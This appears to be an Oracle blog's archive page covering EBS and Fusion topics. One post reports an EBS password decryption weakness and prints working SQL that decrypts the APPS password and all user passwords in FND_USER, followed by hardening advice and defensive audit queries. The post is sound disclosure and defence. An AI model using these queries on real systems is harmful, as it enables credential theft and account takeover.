For all of you EBS gurus out there, take comfort in knowing that there are similarities between Fusion and EBS. Not everything is similar though, and in some cases, it may be easier to forget your knowledge of “how EBS does it” and learn “how Fusion does it” without trying to translate.
via Oracle Fusion Financials Blog.
Leave a comment | Filed in Oracle | Tags: EBS
There is a third issue, after support cost, and availability, there is the big issue around the upgrade path. Oracle have always said that there would be an upgrade path from the latest two releases which at the time was 11.5.10 and 12.0, but now we also have 12.1 so there is only a path from 12.0 onwards. Is this fair, well I am not sure, in most cases I see the move to Fusion Apps as a replacement is not the best thing for an organisation, especially one who has not already moved to R12, so not having the option is not a problem.
Comments Off | Filed in Oracle | Tags: EBS, fusion
[...]
I think a lot of people will take Fusion but in small steps, taking the co-existence route, after perhaps adopting some technology first, over time.
Oracle Workflow, a component of Oracle E-Business Suite, lets you set up subscriptions to business events which can launch workflows or enable messages to be propagated from one system to another when business events occur.
The Oracle Workflow Business Event System is an application service that leverages the Oracle Advanced Queuing (AQ) infrastructure to communicate business events between systems.
Predefined events are provided with some Oracle E-Business Suite products. For example, the “Create Person Event” (oracle.apps.ar.hz.Person.create) is the name of a seeded business event in the Receivables application. The event is triggered when a person party record is created within the Trading Community Architecture (TCA).
Not all events are seeded. However, Oracle gives you the option to create a custom event. An example would be an event that is triggered when an invoice is matched to a purchase order.
In this article, I will show you how to create and use a custom business event. I will go through the following steps:
Consume the event in PL/SQL
Floyd Teter on Oracle E-Business Suite:
Here’s the upshot for those of you “keeping the faith” with 11i. The iceberg is melting, the curtain is coming down, the lights are dimming, the fat lady is singing. The later versions of 11i were good things…we got bundles of value out of 11i…but, like it or not, it’s winding down in favor of a better product in R12.1.3. It’s time to upgrade. Frankly, the longer you keep the faith with 11i, the more you’ll miss out on the value of the new products…and the more it will cost when you do make the move.
Comments Off | Filed in Oracle | Tags: EBS
Isam Alyousfi and Lester Gutierrez are key members of our Applications Performance Group. They recently presented their popular session covering performance tuning tips for all layers of the E-Business Suite at OAUG/Collaborate earlier this year. [...] This presentation is chock full of tips, pointers, and hard-won knowledge. It represents the distillation of countless performance-related Service Requests and customer escalations. If you’re grappling with performance issues in your environment, or simply trying to squeeze more performance out of existing hardware, I’d strongly recommend downloading this presentation.
Tuning All Layers Of E-Business Suite – Performance Topics
Comments Off | Filed in Oracle | Tags: EBS, performance, presentation
The E-Business Suite Technology Group recently released a whitepaper: Extending E-Business Suite 12.1.3 using Oracle Application Express. In summary, “This new whitepaper outlines how to extend Oracle E-Business Suite 12.1.3 (and higher) functionality using Oracle Application Express. Recommended architecture and security considerations are discussed in detail.” For some time now EBS customers have used APEX to extend EBS, with the release of this whitepaper the EBS Tech group has acknowledged the growing use of APEX to extend EBS and has provided recommendations and guidelines for integration.
Comments Off | Filed in Links, Oracle | Tags: adf, apex, EBS, oaf
What’s this all about some might ask, is Oracle moving to incorporate APEX as part of the standard EBS tech stack? What about OAF? Isn’t Fusion Applications built on ADF, so what’s up? Well when it comes to Oracle EBS extension and customization, OAF is still the top dog, the E-Business Suite Technology Group continues to recommend OAF for EBS extensions.
Oracle Applications 11i Encrypted Password String Disclosure (PDF): An undisclosed security vulnerability exists in Oracle Applications 11i that may allow an unauthenticated, internal attacker to obtain Oracle Applications’ user account encrypted password strings, which in turn can be decrypted using previously published information. An attacker can potentially obtain either any user’s password or the Oracle Applications’ main database account password (APPS).
Building an Audit Trail in an Oracle Applications Environment (PDF): Sarbanes-Oxley’s section 404 requires a company’s key systems be audited. However, many companies have “unauditable” systems and don’t even know it. This paper explores methods by which companies can create an auditable system by implementing various levels of audit trails in Oracle Applications.
Dissecting the Redo Logs (PDF): This paper delves into the guts of the undocumented binary format of the redo logs and shows the forensics examiner, if there is evidence to be found, how to find it and how it can be integrated into a time line of events. It also explores how an attacker can attempt to cover their tracks and how to spot this.
Locating dropped objects (PDF): This paper shows, even when an object has been dropped and purged from the system there will be, in the vast majority of cases, fragments left “lying around” which can be sewn together to build an accurate picture of the actions the attacker took. Perhaps, depending upon how quickly an investigation takes place from the incident in question, even all data pertaining to the dropped object or objects may still be found.
Isolating Evidence of Attacks Against the Authentication Mechanism (PDF): This paper looks at attacks against the authentication mechanism and evidence to check whether a logon attempt was successful or not. It also looks at other attacks leveled at the authentication process including SID guessing, user enumeration and brute forcing of passwords over the network. Moreover, the paper looks at the differences between a logon attempt via the FTP and Web services provided with the XML Database and directly with the RDBMS itself.
We are in the process of upgrading our Oracle E-Business Suite (EBS) from 11.0.3 to 11.5.10 (more on that later). So, I frequently visit the EBS Electronic Technical Reference Manual (eTRM) to browse and try to understand the data models, database design and APIs of some EBS modules. When I logged in this morning I noticed that the eTRM for EBS release 12 had been posted. I thought of sharing this news with you.

Note: you need a Metalink account in order to be able to browse the eTRM.
Comments Off | Filed in Oracle | Tags: EBS
Johan Louwers published an Oracle Applications passwords decryption vulnerability that allows a malicious user to expose the passwords of any Oracle Applications user. In Oracle E-Business Suite, usernames and their encrypted passwords are stored in the table fnd_user:
SQL> desc fnd_user;
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------
 USER_ID                                   NOT NULL NUMBER(15)
 USER_NAME                                 NOT NULL VARCHAR2(100)
 LAST_UPDATE_DATE                          NOT NULL DATE
 LAST_UPDATED_BY                           NOT NULL NUMBER(15)
 CREATION_DATE                             NOT NULL DATE
 CREATED_BY                                NOT NULL NUMBER(15)
 LAST_UPDATE_LOGIN                                  NUMBER(15)
 ENCRYPTED_FOUNDATION_PASSWORD             NOT NULL VARCHAR2(100)
 ENCRYPTED_USER_PASSWORD                   NOT NULL VARCHAR2(100)
 ...
The column ENCRYPTED_USER_PASSWORD stores the encrypted value of the user’s password. The column ENCRYPTED_FOUNDATION_PASSWORD stores the encrypted value of the guest user.
To decrypt the ENCRYPTED_USER_PASSWORD you need access to the DECRYPT function in the APPS.FND_WEB_SEC package. Since DECRYPT is a private function, you need to add the declaration of this function to the package specification so that you can use it outside the package.
FUNCTION decrypt(key IN VARCHAR2, value IN VARCHAR2)
RETURN VARCHAR2;
The key is the decrypted ENCRYPTED_FOUNDATION_PASSWORD. The value is the ENCRYPTED_USER_PASSWORD.
So, the first step in the decryption of a user’s password is to decrypt the ENCRYPTED_FOUNDATION_PASSWORD. This can be accomplished by executing the following query:
WITH guest AS
     (
      SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
             UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                            1,
                            INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                   '/'
                                  )
                            - 1
                           )
                   ) user_name
        FROM DUAL)
SELECT fnd_web_sec.decrypt (guest.user_pwd,
                            fnd_user.encrypted_foundation_password
                           ) apps_password
  FROM fnd_user,
       guest
 WHERE fnd_user.user_name = guest.user_name
Using the above query, we can now decrypt all the values in the FND_USER.ENCRYPTED_USER_PASSWORD column:
WITH guest AS
     (
      SELECT UPPER (fnd_profile.VALUE ('GUEST_USER_PWD')) user_pwd,
             UPPER (SUBSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                            1,
                            INSTR (fnd_profile.VALUE ('GUEST_USER_PWD'),
                                   '/'
                                  )
                            - 1
                           )
                   ) user_name
        FROM DUAL)
SELECT fnd_user.user_name,
       fnd_web_sec.decrypt
          ((SELECT fnd_web_sec.decrypt
                      (guest.user_pwd,
                       fnd_user.encrypted_foundation_password
                      ) apps_password
              FROM fnd_user,
                   guest
             WHERE fnd_user.user_name = guest.user_name),
           fnd_user.encrypted_user_password
          ) decrypted_user_password
  FROM fnd_user
 ORDER BY fnd_user.user_name
VOILA!
Of course, in order for the above queries to work, you have to have the privilege to modify and compile the package APPS.FND_WEB_SEC. Assuming that you do have this privilege on a development instance and assuming that passwords are not reset when a development instance is refreshed from a production instance, this can represent a serious security risk.
Updated a few hours later: Stephen Kost just blogged about this subject. He writes that since the decryption routine is a Java class, it is actually easy to create a Java application that calls the decrypt method. So, no need to even have access to a database to run the decrypt. Moreover, he does not expect Oracle to fix this password weakness in the foreseeable future. He also offers a few recommendations to improve the security of the user passwords, like making sure that APPLSYSPUB does not have SELECT privileges on APPS.FND_USER_VIEW, changing the passwords for all Oracle Applications 11i seeded accounts, creating all new user accounts with strong and unique passwords and limiting access to the APPLSYS.FND_USER and APPLSYS.FND_ORACLE_USERID tables by all non-DBA accounts.
Updated January 9 2007: Oracle Applications Password Decryption (PDF)
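Both the precondition described above (a DECRYPT declaration added to the APPS.FND_WEB_SEC specification) and the access recommendations can be checked from the data dictionary. The queries below are an added example, not code from the original post or from Oracle; they assume a session that can read the DBA_* views and that the package specification source is stored unwrapped.

```sql
-- Added example: defensive dictionary checks, not part of the original post.
-- Assumes the session can read DBA_OBJECTS, DBA_SOURCE, DBA_TAB_PRIVS and
-- DBA_ROLE_PRIVS.

-- Check 1: is DECRYPT declared in the APPS.FND_WEB_SEC specification?
-- The post's queries only work after that declaration is added, so any row
-- with a non-null LINE, or an unexpected LAST_DDL_TIME, needs investigating.
-- Assumption: the specification source is stored unwrapped.
SELECT o.status,
       o.last_ddl_time,
       s.line,
       s.text
  FROM dba_objects o
  LEFT JOIN dba_source s
    ON s.owner = o.owner
   AND s.name = o.object_name
   AND s.type = o.object_type
   AND UPPER (s.text) LIKE '%DECRYPT%'
 WHERE o.owner = 'APPS'
   AND o.object_name = 'FND_WEB_SEC'
   AND o.object_type = 'PACKAGE'
 ORDER BY s.line;

-- Check 2: who holds object privileges on the password-bearing objects
-- named in the recommendations, directly or through one level of role?
WITH sensitive AS
     (SELECT p.owner, p.table_name, p.privilege, p.grantee
        FROM dba_tab_privs p
       WHERE (p.owner, p.table_name) IN (('APPLSYS', 'FND_USER'),
                                         ('APPLSYS', 'FND_ORACLE_USERID'),
                                         ('APPS', 'FND_USER_VIEW')))
SELECT s.owner, s.table_name, s.privilege, s.grantee,
       CAST (NULL AS VARCHAR2 (128)) via_role
  FROM sensitive s
UNION ALL
SELECT s.owner, s.table_name, s.privilege, r.grantee, r.granted_role
  FROM sensitive s
  JOIN dba_role_privs r
    ON r.granted_role = s.grantee
 ORDER BY 1, 2, 4;
```

Check 2 covers object grants only; accounts holding system privileges such as SELECT ANY TABLE, or roles nested more than one level deep, need a separate review.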
18 Comments | Filed in Oracle, Security | Tags: EBS, hack
Steven Chan has just published a couple of useful posts. The first is a high level map of Oracle’s latest E-Business Suite Release 11i technology stack architecture:

The second is a cheat sheet that explains the relationships between Oracle marketing brands, products, product families, versions, and patchsets. He gives simple definitions for the following terms:
Thanks Steve.
Comments Off | Filed in Oracle | Tags: cheat-sheet, EBS